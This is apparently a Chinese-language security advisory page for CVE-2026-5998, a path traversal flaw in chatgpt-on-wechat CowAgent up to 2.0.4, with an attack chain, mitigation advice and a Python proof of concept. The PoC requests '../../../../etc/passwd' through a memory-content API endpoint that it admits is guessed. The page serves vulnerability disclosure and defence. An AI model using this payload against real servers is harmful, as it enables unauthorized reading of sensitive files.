CVE-2026-5998 CVSS 5.3 中危

CVE-2026-5998 zhayujie路径遍历漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5998

漏洞类型

路径遍历

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

zhayujie chatgpt-on-wechat CowAgent

漏洞概述

zhayujie chatgpt-on-wechat CowAgent 2.0.4及之前版本存在路径遍历漏洞。漏洞源于agent/memory/service.py文件中dispatch函数对filename参数处理不当。攻击者可在无需认证的情况下远程利用该漏洞，通过构造恶意参数读取服务器敏感文件。目前利用代码已公开，建议用户尽快升级至2.0.5版本。

技术细节

该漏洞位于zhayujie chatgpt-on-wechat CowAgent组件的API Memory Content Endpoint中。具体受影响代码位于agent/memory/service.py文件的dispatch函数。由于代码逻辑缺陷，该函数在处理用户请求时，未对传入的filename参数进行严格的输入验证和路径规范化处理。攻击者可以利用这一漏洞，通过在filename参数中插入“../”序列或绝对路径，绕过应用程序对文件访问的限制。根据CVSS 3.1评分，该漏洞评分为5.3（中危），攻击复杂度低，无需特权且无需用户交互即可通过网络发起远程攻击。成功利用后，攻击者可读取服务器上的任意文件（如配置文件、源代码等），导致严重的信息泄露风险。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是zhayujie chatgpt-on-wechat CowAgent 2.0.4或更早版本。

STEP 2

漏洞利用

攻击者向API Memory Content Endpoint发送特制的HTTP请求，在filename参数中包含路径遍历序列（如../）。

STEP 3

数据泄露

服务器端未正确过滤参数，导致攻击者能够读取Web目录之外的敏感文件（如/etc/passwd）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_url):
    """
    PoC for CVE-2026-5998: Path Traversal in zhayujie chatgpt-on-wechat
    """
    # Vulnerable endpoint based on description (API Memory Content Endpoint)
    endpoint = "/api/memory/content" 
    
    # Malicious filename parameter to traverse directories
    # Attempting to read /etc/passwd on Linux systems
    payload = {
        "filename": "../../../../etc/passwd"
    }

    try:
        # Sending the GET request to the target
        response = requests.get(f"{target_url}{endpoint}", params=payload, timeout=10)
        
        # Check if the response contains indicators of success
        if response.status_code == 200 and "root:" in response.text:
            print("[+] Vulnerability exploited successfully!")
            print(f"[+] Response content:\n{response.text}")
        else:
            print("[-] Exploit failed or target is not vulnerable.")
            print(f"Status Code: {response.status_code}")
            
    except Exception as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://127.0.0.1:8080"
    exploit_poc(target)

影响范围

zhayujie chatgpt-on-wechat CowAgent <= 2.0.4

防御指南

临时缓解措施

如果无法立即升级，建议通过防火墙或网络策略限制对API端点的外部访问，仅允许受信任的内部网络IP连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表